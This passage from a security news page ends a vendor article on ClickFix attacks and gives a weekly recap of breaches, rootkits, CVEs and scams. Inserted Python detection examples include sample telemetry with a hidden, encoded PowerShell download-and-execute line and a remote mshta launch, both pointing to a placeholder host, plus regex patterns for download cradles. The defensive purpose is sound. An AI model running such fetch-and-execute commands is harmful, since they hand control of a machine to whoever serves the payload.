    The malicious commands themselves might be obfuscated or broken into stages to avoid easy detection by heuristic rules. EDR telemetry might record that a PowerShell process ran, but without a known bad signature or a clear policy violation, it may not flag it immediately.
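    As an added example that is not part of the article or any vendor product, here is a heuristic triage function over process-creation telemetry of the kind just described: a LOLBin launched straight from the shell, a hidden window, an encoded command and a download cradle are scored together, and the encoded payload is decoded so that encoding alone does not hide the cradle. The sample events, the thresholds and the placeholder host example.invalid are constructed assumptions.

```python
"""Heuristic triage of process-creation events for ClickFix-style launches (added example)."""
import base64
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcessEvent:
    parent: str    # parent image, e.g. explorer.exe when launched from the Run dialog
    image: str     # image that was started
    cmdline: str   # command line recorded by the sensor


# Binaries the article names (mshta, PowerShell) plus other living-off-the-land launchers.
LOLBINS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe", "curl.exe",
           "bitsadmin.exe", "certutil.exe", "rundll32.exe", "regsvr32.exe",
           "wscript.exe", "cscript.exe", "msiexec.exe"}
# Parents that mean "the user typed it" (Run dialog, terminal) rather than a browser or mail client.
USER_LAUNCHERS = {"explorer.exe", "cmd.exe"}

ENCODED_RX = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.I)
INDICATORS = {
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "encoded_command": ENCODED_RX,
    "policy_bypass": re.compile(r"-e(?:xecutionpolicy|p)\s+bypass|-nop\b", re.I),
    "download_cradle": re.compile(
        r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|\bcurl\b|\bwget\b|bitsadmin|urlcache", re.I),
    "remote_url": re.compile(r"https?://", re.I),
    "invoke_expression": re.compile(r"\biex\b|invoke-expression", re.I),
    "remote_hta": re.compile(r"mshta(?:\.exe)?\s+\S*https?://", re.I),
}


def decode_encoded_command(cmdline: str) -> str:
    """Return the -EncodedCommand payload (base64 of UTF-16LE) as text, or '' if absent or invalid."""
    m = ENCODED_RX.search(cmdline)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return ""


def score_event(ev: ProcessEvent) -> dict:
    """Score one event; the decoded payload is scanned too, so encoding alone does not hide a cradle."""
    if ev.image.lower() not in LOLBINS:
        return {"score": 0, "hits": [], "verdict": "none", "decoded": ""}
    decoded = decode_encoded_command(ev.cmdline)
    text = ev.cmdline + ("\n" + decoded if decoded else "")
    hits = [name for name, rx in INDICATORS.items() if rx.search(text)]
    score = len(hits)
    # The ClickFix tell from the article: the LOLBin is launched by the user from the shell, so there
    # is no browser or mail-client parent tying it to a delivery channel. Weight that combination up.
    if hits and ev.parent.lower() in USER_LAUNCHERS:
        hits.append("user_launched_lolbin")
        score += 2
    verdict = "alert" if score >= 4 else "suspicious" if score >= 2 else "none"
    return {"score": score, "hits": hits, "verdict": verdict, "decoded": decoded}


# Constructed sample telemetry; example.invalid is a placeholder host, not a real indicator.
SAMPLE_PAYLOAD = "iwr http://example.invalid/p | iex"
SAMPLE_ENCODED = base64.b64encode(SAMPLE_PAYLOAD.encode("utf-16le")).decode()
SAMPLE_EVENTS = [
    ProcessEvent("explorer.exe", "powershell.exe",
                 f"powershell.exe -w hidden -ep bypass -enc {SAMPLE_ENCODED}"),
    ProcessEvent("explorer.exe", "mshta.exe", "mshta.exe https://example.invalid/verify.hta"),
    ProcessEvent("explorer.exe", "powershell.exe", "powershell.exe -NoProfile -Command Get-Date"),
    ProcessEvent("chrome.exe", "notepad.exe", "notepad.exe C:\\Users\\alice\\notes.txt"),
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        r = score_event(ev)
        print(f"{r['verdict']:<10} score={r['score']} {ev.parent} -> {ev.image} hits={r['hits']}")
```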

    The final stage at which the attack should be intercepted by any reputable EDR is at the point of malware execution. But detection evasion is a cat-and-mouse game, and attackers are always looking for ways to tweak their malware to evade or disable detection tools. So, exceptions do happen.

    And if you’re an organization that allows employees and contractors to use unmanaged BYOD devices, there’s a strong chance that there are gaps in your EDR coverage.

    Ultimately, organizations are leaving themselves reliant on a single line of defense — if the attack isn’t detected and blocked by EDR, it isn’t spotted at all.

    Why the standard recommendations are falling short

    Most of the vendor-agnostic recommendations have focused on restricting access to services like the Windows Run dialog box for typical users. But although mshta and PowerShell remain the most commonly observed, security researchers have already spotted a wide range of LOLBins targeting different services, many of which are difficult to prevent users from accessing.

    It’s also worth considering how ClickFix-style attacks may continue to evolve in the future. The current attack path straddles browser and endpoint — what if it could take place entirely in the browser and evade EDR altogether? For example, by pasting malicious JavaScript directly into the devtools on a relevant webpage.

    The current hybrid attack path sees the attacker deliver lures in the browser, to compromise the endpoint, to get access to creds and cookies stored in the browser. What if you could skip the endpoint altogether?

    Stopping ClickFix on the front line — in the browser

    Push Security’s latest feature, malicious copy and paste detection, tackles ClickFix-style attacks at the earliest opportunity through browser-based detection and blocking. This is a universally effective control that works regardless of the lure delivery channel, page style and structure, or the specifics of the malware type and execution.

    Unlike heavy-handed DLP solutions that block copy-paste altogether, Push protects your employees without disrupting their user experience or hampering productivity.


    Learn more

    If you want to learn more about ClickFix attacks and how they’re evolving, check out this upcoming webinar where Push Security researchers will be diving into real-world ClickFix examples and demonstrating how ClickFix sites work under the hood.

    Push Security’s browser-based security platform provides comprehensive attack detection and response capabilities against techniques like AiTM phishing, credential stuffing, ClickFixing, malicious browser extensions, and session hijacking using stolen session tokens. You can also use Push to find and fix vulnerabilities across the apps that your employees use, like ghost logins, SSO coverage gaps, MFA gaps, vulnerable passwords, risky OAuth integrations, and more, to harden your identity attack surface.

    To learn more about Push, check out our latest product overview or book some time with one of our team for a live demo.



    Source: thehackernews.com…

  • ⚡ Weekly Recap: F5 Breached, Linux Rootkits, Pixnapping Attack, EtherHiding & More

    ⚡ Weekly Recap: F5 Breached, Linux Rootkits, Pixnapping Attack, EtherHiding & More

    It’s easy to think your defenses are solid — until you realize attackers have been inside them the whole time. The latest incidents show that long-term, silent breaches are becoming the norm. The best defense now isn’t just patching fast, but watching smarter and staying alert for what you don’t expect.

    Here’s a quick look at this week’s top threats, new tactics, and security stories shaping the landscape.

    ⚡ Threat of the Week

    F5 Exposed to Nation-State Breach — F5 disclosed that unidentified threat actors broke into its systems and stole files containing some of BIG-IP’s source code and information related to undisclosed vulnerabilities in the product. The company said it learned of the incident on August 9, 2025, although it’s believed that the attackers were in its network for at least 12 months. The attackers are said to have used a malware family called BRICKSTORM, which is attributed to a China-nexus espionage group dubbed UNC5221. GreyNoise said it observed elevated scanning activity targeting BIG-IP in three waves on September 23, October 14, and October 15, 2025, but emphasized the anomalies may not necessarily relate to the hack. Censys said it identified over 680,000 F5 BIG-IP load balancers and application gateways visible on the public internet, with the majority of hosts located in the U.S., followed by Germany, France, Japan, and China. Not all identified systems are necessarily vulnerable, but each represents a publicly accessible interface that should be inventoried, access-restricted, and patched proactively as a precautionary measure. “Edge infrastructure and security vendors remain prime targets for long-term, often state-linked threat actors,” John Fokker, vice president of threat intelligence strategy at Trellix, said. “Over the years, we have seen nation-state interest in exploiting vulnerabilities in edge devices, recognizing their strategic position in global networks. Incidents like these remind us that strengthening collective resilience requires not only hardened technology but also open collaboration and intelligence sharing across the security community.”

    🔔 Top News

    • N. Korea Uses EtherHiding to Hide Malware Inside Blockchain Smart Contracts — North Korean threat actors have been observed leveraging the EtherHiding technique to distribute malware and enable cryptocurrency theft, marking the first time a state-sponsored hacking group has embraced the method. The activity has been attributed to a cluster tracked as UNC5342 (aka Famous Chollima). The attack wave is part of a long-running campaign codenamed Contagious Interview, wherein the attackers approach potential targets on LinkedIn by posing as recruiters or hiring managers, and trick them into running malicious code under the pretext of a job assessment after shifting the conversation to Telegram or Discord. In the latest attack waves observed since February 2025, the threat actors use a JavaScript downloader that interacts with a malicious BSC smart contract to download JADESNOW, which subsequently queries the transaction history associated with an Ethereum address to fetch the JavaScript version of InvisibleFerret.
    • LinkPro Linux Rootkit Spotted in the Wild — An investigation into the compromise of an Amazon Web Services (AWS)-hosted infrastructure led to the discovery of a new GNU/Linux rootkit dubbed LinkPro. The backdoor features functionalities relying on the installation of two extended Berkeley Packet Filter (eBPF) modules to conceal itself and to be remotely activated upon receiving a magic packet – a TCP SYN packet with a specific window size (54321) that signals the rootkit to await further instructions within a one-hour window, allowing it to evade traditional security defenses. The commands supported by LinkPro include executing /bin/bash in a pseudo-terminal, running a shell command, enumerating files and directories, performing file operations, downloading files, and setting up a SOCKS5 proxy tunnel. It’s currently not known who is behind the attack, but it’s suspected that the threat actors are financially motivated.
    • Zero Disco Campaign Targets Cisco Devices with Rootkits — A new campaign has exploited a recently disclosed security flaw impacting Cisco IOS Software and IOS XE Software to deploy Linux rootkits on older, unprotected systems. The activity, codenamed Operation Zero Disco by Trend Micro, involves the weaponization of CVE-2025-20352 (CVSS score: 7.7), a stack overflow vulnerability in the Simple Network Management Protocol (SNMP) subsystem that could allow an authenticated, remote attacker to execute arbitrary code by sending crafted SNMP packets to a susceptible device. The operation primarily impacted Cisco 9400, 9300, and legacy 3750G series devices, Trend Micro said. The intrusions have not been attributed to any known threat actor or group.
    • Pixnapping Attack Leads to Data Theft on Android Devices — Android devices from Google and Samsung have been found vulnerable to a side-channel attack that could be exploited to covertly steal two-factor authentication (2FA) codes, Google Maps timelines, and other sensitive data without the users’ knowledge pixel-by-pixel. The attack has been codenamed Pixnapping. Google is tracking the issue under the CVE identifier CVE-2025-48561 (CVSS score: 5.5). Patches for the vulnerability were issued by the tech giant as part of its September 2025 Android Security Bulletin, with additional fixes forthcoming in December.
    • Chinese Threat Actors Exploited ArcGIS Server as Backdoor — Threat actors with ties to China have been attributed to a novel campaign that compromised an ArcGIS system and turned it into a backdoor for more than a year. The activity is the handiwork of a Chinese state-sponsored hacking group called Flax Typhoon, which is also tracked as Ethereal Panda and RedJuliett. “The group cleverly modified a geo-mapping application’s Java server object extension (SOE) into a functioning web shell,” ReliaQuest said. “By gating access with a hardcoded key for exclusive control and embedding it in system backups, they achieved deep, long-term persistence that could survive a full system recovery.” The attack chain involved the threat actors targeting a public-facing ArcGIS server that was linked to a private, internal ArcGIS server by compromising a portal administrator account to deploy a malicious SOE, thereby allowing them to blend in with normal traffic and maintain access for extended periods. The attackers then instructed the public-facing server to create a hidden directory to serve as the group’s “private workspace.” They also blocked access to other attackers and admins with a hard-coded key. The findings demonstrate Flax Typhoon’s consistent modus operandi of quietly turning an organization’s own tools against itself rather than using sophisticated malware or exploits.
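    An added detection example for the LinkPro item above (written for this page, not taken from the LinkPro report or any vendor tooling): it parses raw IPv4/TCP headers, flags a pure SYN whose window field is 54321, and then flags any further traffic from that source to the same host during the one-hour activation window the report describes. The 10.0.0.x addresses, ports and timestamps in the sample capture are constructed.

```python
"""Detect the LinkPro activation packet (TCP SYN, window 54321) and follow-on traffic (added example)."""
import struct
from dataclasses import dataclass
from typing import Optional

LINKPRO_MAGIC_WINDOW = 54321   # window size named in the report summarised above
ACTIVATION_WINDOW_S = 3600     # the rootkit awaits instructions for about one hour after the trigger
TCP_SYN, TCP_ACK = 0x02, 0x10
IPPROTO_TCP = 6


@dataclass(frozen=True)
class TcpSummary:
    src: str
    dst: str
    sport: int
    dport: int
    flags: int
    window: int


def parse_ipv4_tcp(packet: bytes) -> Optional[TcpSummary]:
    """Parse the IPv4 and TCP headers of a raw packet; None if it is not IPv4/TCP."""
    if len(packet) < 20 or packet[0] >> 4 != 4:
        return None
    ihl = (packet[0] & 0x0F) * 4
    if ihl < 20 or packet[9] != IPPROTO_TCP or len(packet) < ihl + 20:
        return None
    src = ".".join(str(b) for b in packet[12:16])
    dst = ".".join(str(b) for b in packet[16:20])
    sport, dport, _seq, _ack, off_flags, window = struct.unpack("!HHIIHH", packet[ihl:ihl + 16])
    return TcpSummary(src, dst, sport, dport, off_flags & 0x1FF, window)


def is_linkpro_magic(pkt: TcpSummary) -> bool:
    """Pure SYN (no ACK) whose window field carries the LinkPro trigger value."""
    return bool(pkt.flags & TCP_SYN) and not (pkt.flags & TCP_ACK) and pkt.window == LINKPRO_MAGIC_WINDOW


class MagicPacketMonitor:
    """Alert on the trigger, then on traffic from the same source to the host during the activation window."""

    def __init__(self) -> None:
        self._armed: dict = {}   # (src, dst) -> timestamp of the trigger packet

    def observe(self, ts: float, packet: bytes) -> list:
        pkt = parse_ipv4_tcp(packet)
        if pkt is None:
            return []
        key = (pkt.src, pkt.dst)
        if is_linkpro_magic(pkt):
            self._armed[key] = ts
            return [f"LINKPRO_TRIGGER {pkt.src}->{pkt.dst}:{pkt.dport} window={pkt.window}"]
        armed_at = self._armed.get(key)
        if armed_at is not None and ts - armed_at <= ACTIVATION_WINDOW_S:
            return [f"LINKPRO_FOLLOWON {pkt.src}->{pkt.dst}:{pkt.dport} {ts - armed_at:.0f}s after trigger"]
        return []


def build_ipv4_tcp(src: str, dst: str, sport: int, dport: int, flags: int, window: int) -> bytes:
    """Build a minimal 40-byte IPv4+TCP header pair (checksums zero; constructed test input only)."""
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 40, 0, 0, 64, IPPROTO_TCP, 0,
                     bytes(int(o) for o in src.split(".")), bytes(int(o) for o in dst.split(".")))
    tcp = struct.pack("!HHIIHHHH", sport, dport, 0, 0, (5 << 12) | flags, window, 0, 0)
    return ip + tcp


# Constructed capture: the trigger, a follow-on connection two minutes later, a SYN-ACK that merely
# happens to carry window 54321, ordinary noise, and a connection well outside the activation window.
SAMPLE_CAPTURE = [
    (0.0, build_ipv4_tcp("10.0.0.5", "10.0.0.9", 40001, 22, TCP_SYN, LINKPRO_MAGIC_WINDOW)),
    (120.0, build_ipv4_tcp("10.0.0.5", "10.0.0.9", 40002, 443, TCP_SYN, 65535)),
    (130.0, build_ipv4_tcp("10.0.0.7", "10.0.0.9", 40003, 22, TCP_SYN | TCP_ACK, LINKPRO_MAGIC_WINDOW)),
    (140.0, build_ipv4_tcp("10.0.0.8", "10.0.0.9", 40004, 80, TCP_SYN, 64240)),
    (5000.0, build_ipv4_tcp("10.0.0.5", "10.0.0.9", 40005, 443, TCP_SYN, 65535)),
]


def scan_capture(capture) -> list:
    """Run the monitor over (timestamp, raw packet) pairs and collect the alerts."""
    mon = MagicPacketMonitor()
    alerts = []
    for ts, raw in capture:
        alerts.extend(mon.observe(ts, raw))
    return alerts


if __name__ == "__main__":
    for line in scan_capture(SAMPLE_CAPTURE):
        print(line)
```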

    🔥 Trending CVEs

    Hackers move fast. They often exploit new vulnerabilities within hours, turning a single missed patch into a major breach. One unpatched CVE can be all it takes for a full compromise. Below are this week’s most critical vulnerabilities gaining attention across the industry. Review them, prioritize your fixes, and close the gap before attackers take advantage.

    This week’s list includes — CVE-2025-24990, CVE-2025-59230 (Microsoft Windows), CVE-2025-47827 (IGEL OS before 11), CVE-2023-42770, CVE-2023-40151 (Red Lion Sixnet RTUs), CVE-2025-2611 (ICTBroadcast), CVE-2025-55315 (Microsoft ASP.NET Core), CVE-2025-11577 (Clevo UEFI firmware), CVE-2025-37729 (Elastic Cloud Enterprise), CVE-2025-9713, CVE-2025-11622 (Ivanti Endpoint Manager), CVE-2025-48983, CVE-2025-48984 (Veeam), CVE-2025-11756 (Google Chrome), CVE-2025-49201 (Fortinet FortiPAM and FortiSwitch Manager), CVE-2025-58325 (Fortinet FortiOS CLI), CVE-2025-49553 (Adobe Connect collaboration suite), CVE-2025-9217 (Slider Revolution plugin), CVE-2025-10230 (Samba), CVE-2025-54539 (Apache ActiveMQ), CVE-2025-41703, CVE-2025-41704, CVE-2025-41706, CVE-2025-41707 (Phoenix Contact QUINT4), and CVE-2025-11492, CVE-2025-11493 (ConnectWise Automate).

    📰 Around the Cyber World

    • Microsoft Unveils New Security Improvements — Microsoft revealed that “parts of the kernel in Windows 11 have been rewritten in Rust, which helps mitigate against memory corruption vulnerabilities like buffer overflows and helps reduce attack surfaces.” The company also noted that it’s taking steps to secure AI-powered agentic experiences on the operating system by ensuring that they operate with limited permissions and only obtain access to resources users explicitly grant them permission to use. In addition, Microsoft said agents that integrate with Windows must be cryptographically signed by a trusted source so that they can be revoked if found to be malicious. Each AI agent will also run under its own dedicated agent account that’s distinct from the user account on the device. “This facilitates agent-specific policy application that can be different from the rules applied to other accounts like those for human users,” it said.
    • SEO Campaign Uses Fake Ivanti Installers to Steal Credentials — A new attack campaign has leveraged SEO poisoning to lure users into downloading a malicious version of the Ivanti Pulse Secure VPN client. The activity targets users searching for legitimate software on search engines like Bing, redirecting them to attacker-controlled lookalike websites (ivanti-pulsesecure[.]com or ivanti-secure-access[.]org). The goal of this attack is to steal VPN credentials from the victim’s machine, enabling further compromise. “The malicious installer, a signed MSI file, contains a credential-stealing DLL designed to locate, parse, and exfiltrate VPN connection details,” Zscaler said. “The malware specifically targets the connectionstore.dat file to steal saved VPN server URIs, which it combines with hardcoded credentials for exfiltration. Data is sent to a command-and-control (C2) server hosted on Microsoft Azure infrastructure.”
    • Qilin’s Ties with BPH Providers Exposed — Cybersecurity researchers from Resecurity examined the Qilin ransomware group’s “close affiliation” with underground bulletproof hosting (BPH) operators, finding that the e-crime actor has not only relied on Cat Technologies Co. Limited (which, in turn, is hosted on an IP address tied to Aeza Group) for hosting its data leak site, but also advertised services like BEARHOST Servers (aka Underground) on its WikiLeaksV2 site, where the group publishes content about its activities. BEARHOST has been operational since 2016, offering its services for anywhere from $95 to $500. While BEARHOST abruptly announced the stoppage of its service on December 28, 2024, it is assessed that the threat actors have taken the BPH service into private mode, catering only to trusted and vetted underground actors. On May 8, 2025, it resurfaced as Voodoo Servers, only for the operators to terminate the service again towards the end of the month, citing political reasons. “The actors decided to disappear through an ‘exit scam’ scenario, keeping the underground audience completely clueless,” Resecurity said. “Notably, the legal entities behind the service continue their operations.” Cat Technologies Co. Limited also shares links to shadowy entities like Red Bytes LLC, Hostway, Starcrecium Limited, and Chang Way Technologies Co. Limited, the last of which has been associated with extensive malware activity, hosting command-and-control (C2) servers of Amadey, StealC, and Cobalt Strike used by cybercriminals. Another entity of note is Next Limited, which shares the same Hong Kong address as Chang Way Technologies Co. Limited and has been attributed to malicious activity in connection with Proton66.
    • U.S. Judge Bars NSO Group from Targeting WhatsApp — A U.S. judge barred NSO Group from targeting WhatsApp users and cut the punitive damages verdict awarded to Meta by a jury in May 2025 to $4 million, because the court did not have enough evidence to determine that NSO Group’s behavior was “particularly egregious.” The permanent injunction handed out by U.S. District Judge Phyllis Hamilton means that the Israeli vendor cannot use WhatsApp as a way to infect targets’ devices. As a refresher, Meta sued the NSO Group in 2019 over the use of Pegasus spyware by exploiting a then-zero-day flaw in the messaging app to spy on 1,400 people from 20 countries, including journalists and human rights activists. NSO Group was fined close to $168 million earlier this May. The proposed injunction requires NSO Group to delete and destroy computer code related to Meta’s platforms, and the judge concluded that the provision is “necessary to prevent future violations, especially given the undetectable nature of defendants’ technology.”
    • Google’s Privacy Sandbox Initiative is Officially Dead — In 2019, Google launched an initiative called Privacy Sandbox to come up with privacy-enhancing alternatives to replace third-party cookies on the web. However, with the company abandoning its plans to deprecate third-party tracking cookies, the project appears to be winding down. To that end, the tech giant said it’s retiring the following Privacy Sandbox technologies citing low levels of adoption: Attribution Reporting API (Chrome and Android), IP Protection, On-Device Personalization, Private Aggregation (including Shared Storage), Protected Audience (Chrome and Android), Protected App Signals, Related Website Sets (including requestStorageAccessFor and Related Website Partition), SelectURL, SDK Runtime and Topics (Chrome and Android). In a statement shared with Adweek, the company said it will continue to work to improve privacy across Chrome, Android, and the web, but not under the Privacy Sandbox branding.
    • Russia Blocks Foreign SIM Cards — Russia said it’s taking steps to temporarily block mobile internet for foreign SIM cards, citing national security reasons. The new rule imposes a mandatory 24-hour mobile internet blackout for anyone entering Russia with a foreign SIM card.
    • Flaw in CORS headers in Web Browsers Disclosed — The CERT Coordination Center (CERT/CC) disclosed details of a vulnerability in cross-origin resource sharing (CORS) headers in Chromium, Google Chrome, Microsoft Edge, Safari, and Firefox that enables the CORS policy to be manipulated. This can be combined with DNS rebinding techniques to issue arbitrary requests to services listening on arbitrary ports, regardless of the CORS policy in place by the target. “An attacker can use a malicious site to execute a JavaScript payload that periodically sends CORS headers in order to ask the server if the cross-origin request is safe and allowed,” CERT/CC explained. “Naturally, the attacker-controlled hostname will respond with permissive CORS headers that will circumvent the CORS policy. The attacker then performs a DNS rebinding attack so that the hostname is assigned the IP address of the target service. After the DNS responds with the changed IP address, the new target inherits the relaxed CORS policy, allowing an attacker to potentially exfiltrate data from the target.” Mozilla is tracking the vulnerability as CVE-2025-8036.
    • Phishing Campaigns Use Microsoft’s Logo for Tech Support Scams — Threat actors are exploiting Microsoft’s name and branding in phishing emails to lure users into fraudulent tech support scams. The messages contain links that, when clicked, take the victims to a fake CAPTCHA challenge, after which they are redirected to a phishing landing page to unleash the next stage of the attack. “After passing the captcha verification, the victim is suddenly visually overloaded with several pop-ups that appear to be Microsoft security alerts,” Cofense said. “Their browser is manipulated to appear locked, and they lose the ability to locate or control their mouse, which adds to the feeling that the system is compromised. This involuntary loss of control creates a faux ransomware experience, leading the user to believe their computer is locked and to take immediate action to remedy the infection.” From there, users are instructed to call a number to reach Windows Support, at which point they are connected to a bogus technician to take the attack forward. “The threat actor could exploit further by asking the user to provide account credentials or persuade the user to install remote desktop tools, allowing full access to their system,” the company said.
    • Taxpayers, Drivers Targeted in Refund and Road Toll Smishing Scams — A smishing campaign has leveraged at least 850 newly-registered domain names in September and early October to target people living in the U.S., the U.K., and elsewhere with phishing links that use tax refunds, road toll charges, or failed package deliveries as a lure. The websites, designed to be loaded only when launched from a mobile device, claim to provide information about their tax refund status or obtain a subsidy of up to £300 to help offset winter fuel costs (note: this is a real U.K. government initiative), only to prompt them to provide personal details such as name, home address, telephone number and email address, as well as payment card information. The entered data is exfiltrated to the attackers over the WebSocket protocol. Some of the scam websites have also been found to target Canadian, German, and Spanish residents and visitors, per Netcraft.
    • Meta’s New Collage Feature May Use Photos in Phone’s Camera Roll — Meta is officially rolling out a new opt-in feature to Facebook users in the U.S. and Canada to suggest the best photos and videos from users’ camera roll and create collages and edits. “With your permission and the help of AI, our new feature enables Facebook to automatically surface hidden gems – those memorable moments that get lost among screenshots, receipts, and random snaps – and edit them to save or share,” the company said. The feature was first tested back in late June 2025. The social media company emphasized that the suggestions are private and that it does not use media obtained from users’ devices via the camera roll to train its models, unless users opt to edit the media with their AI tools or publish those suggestions to Facebook. Users who wish to opt out of the feature can do so by navigating Settings and Privacy > Settings > Preferences > Camera Roll Sharing Suggestions.
    • Fake Homebrew, TradingView, LogMeIn Sites Serve Stealer Malware Targeting Macs — Threat actors are employing social engineering tactics to trick users into visiting fake websites impersonating trusted platforms such as Homebrew, TradingView, and LogMeIn, where they are instructed to copy and run a malicious command in the Terminal app as part of ClickFix-style attacks, resulting in the deployment of stealer malware such as Atomic Stealer and Odyssey Stealer. “More than 85 phishing domains were identified, connected through shared SSL certificates, payload servers, and reused infrastructure,” Hunt.io said. “The findings suggest a coordinated and ongoing campaign in which operators continuously adapt their infrastructure and tactics to maintain persistence and evade detection within the macOS ecosystem.” It’s suspected that users are driven to these websites via sponsored ads on search engines like Bing and Google.
    • Dutch Data Protection Watchdog Fines Experian $3.2 Million for Privacy Violations — The Dutch Data Protection Authority (DPA) imposed a fine of €2.7 million ($3.2 million) on Experian Netherlands for collecting data in contravention of the E.U. General Data Protection Regulation (GDPR). The DPA said the consumer credit reporting company gathered information on people from both public and non-public sources and failed to make it clear why the collection of certain data was necessary. In addition to the penalty, Experian is expected to delete the database of personal data by the end of the year. The company has also ceased its operations in the country. “Until January 1, 2025, Experian provided credit assessments about individuals to its clients,” the DPA said. “To do this, the company collected data such as negative payment behavior, outstanding debts, or bankruptcies. The AP found that Experian violated the law by unlawfully using personal data.”
    • Threat Actors Send Fake Password Manager Breach Alerts — Bad actors are sending phishing alerts claiming that recipients’ password manager accounts for 1Password and LastPass have been compromised in order to trick users into providing their passwords and hijack their accounts. In response to the attack, LastPass said it has not been hacked and that it’s an attempt on the part of the attackers to generate a false sense of urgency. In some cases spotted by Bleeping Computer, the activity has also been found to urge recipients to install a more secure version of the password manager, resulting in the deployment of a legitimate remote access software called Syncro. The software vendor has since moved to shut down the malicious accounts to prevent further installs.
    • SocGholish MaaS Detailed — LevelBlue has published an analysis of a threat activity cluster known as SocGholish (aka FakeUpdates), which is known to be active since 2017, leveraging fake web browser update prompts on compromised websites as a lure to distribute malware. Victims are typically routed through Traffic Distribution Systems (TDS) like Keitaro and Parrot TDS to filter users based on specific factors such as geography, browser type, or system configuration, ensuring that only the intended targets are exposed to the payload. It’s offered under a malware-as-a-service (MaaS) by a financially motivated cybercrime group called TA569. SocGholish stands out for its ability to turn legitimate websites into large-scale distribution platforms for malware. Acting as an initial access broker (IAB), its operations profit from follow-on compromises by other actors. “Once executed, its payloads range from loaders and stealers to ransomware, allowing for extensive follow-up exploitation,” LevelBlue said. “This combination of broad reach, simple delivery mechanisms, and flexible use by multiple groups makes SocGholish a persistent and dangerous threat across industries and regions.” One of its primary users is Evil Corp, with the malware also used to deliver RansomHub in early 2025.
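    For the CORS and DNS rebinding item above, an added example of the server-side guard a practitioner would put in front of an internal service (written for this page, not from CERT/CC or any browser vendor): after rebinding, the browser still sends the attacker’s hostname in Host, so a Host the service does not serve is refused outright, and Access-Control-Allow-Origin is only ever set to an allow-listed Origin rather than echoed from the request. The hostnames app.internal.example and attacker-rebind.example and the allow-lists are constructed assumptions.

```python
"""Server-side guard against the CORS / DNS-rebinding manipulation described above (added example)."""

# Assumed deployment: the names this service legitimately answers to, and the single origin
# permitted to call it cross-origin. Both sets are constructed for the example.
ALLOWED_HOSTS = {"app.internal.example", "localhost", "127.0.0.1", "[::1]"}
ALLOWED_ORIGINS = {"https://app.internal.example"}


def host_without_port(host_header: str) -> str:
    """Normalise a Host header value: lower-case and drop the port, keeping IPv6 brackets."""
    h = host_header.strip().lower()
    if h.startswith("["):                 # e.g. [::1]:8080
        return h.split("]", 1)[0] + "]"
    return h.split(":", 1)[0]


def cors_decision(headers: dict) -> tuple:
    """Return (status, response_headers) for a request, evaluated before any application handler.

    Two independent checks:
      1. Host must be a name we serve. After DNS rebinding the browser still sends the attacker's
         hostname in Host, so an unknown Host means the request was never meant for us: 421.
      2. Access-Control-Allow-Origin is set only to an allow-listed Origin, never echoed from the
         request and never '*', so a permissive policy cannot be borrowed from another host.
    """
    hdr = {k.lower(): v for k, v in headers.items()}
    if host_without_port(hdr.get("host", "")) not in ALLOWED_HOSTS:
        return 421, {}                        # Misdirected Request: refuse before routing
    resp = {"Vary": "Origin"}                 # caches must key on Origin once ACAO depends on it
    origin = hdr.get("origin", "").strip().lower()
    if origin in ALLOWED_ORIGINS:
        resp["Access-Control-Allow-Origin"] = origin
    return 200, resp


# Constructed requests: a legitimate cross-origin call, a rebound request, and an unknown origin.
SAMPLE_REQUESTS = {
    "legit": {"Host": "app.internal.example:8443", "Origin": "https://app.internal.example"},
    "rebound": {"Host": "attacker-rebind.example", "Origin": "https://attacker-rebind.example"},
    "foreign": {"Host": "localhost", "Origin": "https://other.example"},
}

if __name__ == "__main__":
    for name, req in SAMPLE_REQUESTS.items():
        status, resp = cors_decision(req)
        print(f"{name:<8} -> {status} {resp}")
```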

    🎥 Cybersecurity Webinars

    • The Practical Framework to Govern AI Agents Without Slowing Innovation – AI is changing everything fast — but for most security teams, it still feels like a fight just to keep up. The goal isn't to slow innovation with more controls; it's to make those controls work for the business. By building security into AI from the start, you can turn what used to be a bottleneck into a real accelerator for growth and trust.
    • The Future of AI in GRC: Turning Risk Into a Compliance Advantage – AI is changing how companies manage risk and compliance — fast. It brings big opportunities but also new challenges. This webinar shows you how to use AI safely and effectively in GRC, avoid common mistakes, and turn complex rules into a real business advantage.
    • Workflow Clarity: How to Blend AI and Human Effort for Real Results – Too many teams are rushing to “add AI” without a plan — and ending up with messy, unreliable workflows. Join us to learn a clearer approach: how to use AI thoughtfully, simplify automation, and build systems that scale securely.

    🔧 Cybersecurity Tools

    • Beelzebub – It turns honeypot deployment into a powerful, low-code experience. It uses AI to simulate real systems, helping security teams detect attacks, track emerging threats, and share insights through a global threat intelligence network.
    • NetworkHound – It maps your Active Directory network from the inside out. It discovers every device — domain-joined or shadow-IT — validates SMB and web services, and builds a full BloodHound-compatible graph so you can see and secure your environment clearly.

    Disclaimer: These tools are for educational and research use only. They haven’t been fully security-tested and could pose risks if used incorrectly. Review the code before trying them, test only in safe environments, and follow all ethical, legal, and organizational rules.

    🔒 Tip of the Week

    Most Cloud Breaches Aren’t Hacks — They’re Misconfigurations. Here’s How to Fix Them — Cloud storage buckets like AWS S3, Azure Blob, and Google Cloud Storage make data sharing easy — but one wrong setting can expose everything. Most data leaks happen not because of hacking, but because someone left a public bucket, skipped encryption, or used a test bucket that never got locked down. Cloud platforms give you flexibility, not guaranteed safety, so you need to check and control access yourself.

    Misconfigurations usually happen when permissions are too broad, encryption is disabled, or visibility is lost across multiple clouds. Doing manual checks doesn’t scale — especially if you manage data in AWS, Azure, and GCP. The fix is using tools that automatically find, report, and even fix unsafe settings before they cause damage.

    ScoutSuite is a strong starting point for cross-cloud visibility. It scans AWS, Azure, and GCP for open buckets, weak IAM roles, and missing encryption, then creates an easy-to-read HTML report. Prowler goes deeper into AWS, checking S3 settings against CIS and AWS benchmarks to catch bad ACLs or unencrypted buckets.

    For ongoing control, Cloud Custodian lets you write simple policies that automatically enforce rules — for example, forcing all new buckets to use encryption. And CloudQuery can turn your cloud setup into a searchable database, so you can monitor changes, track compliance, and visualize risks in one place.

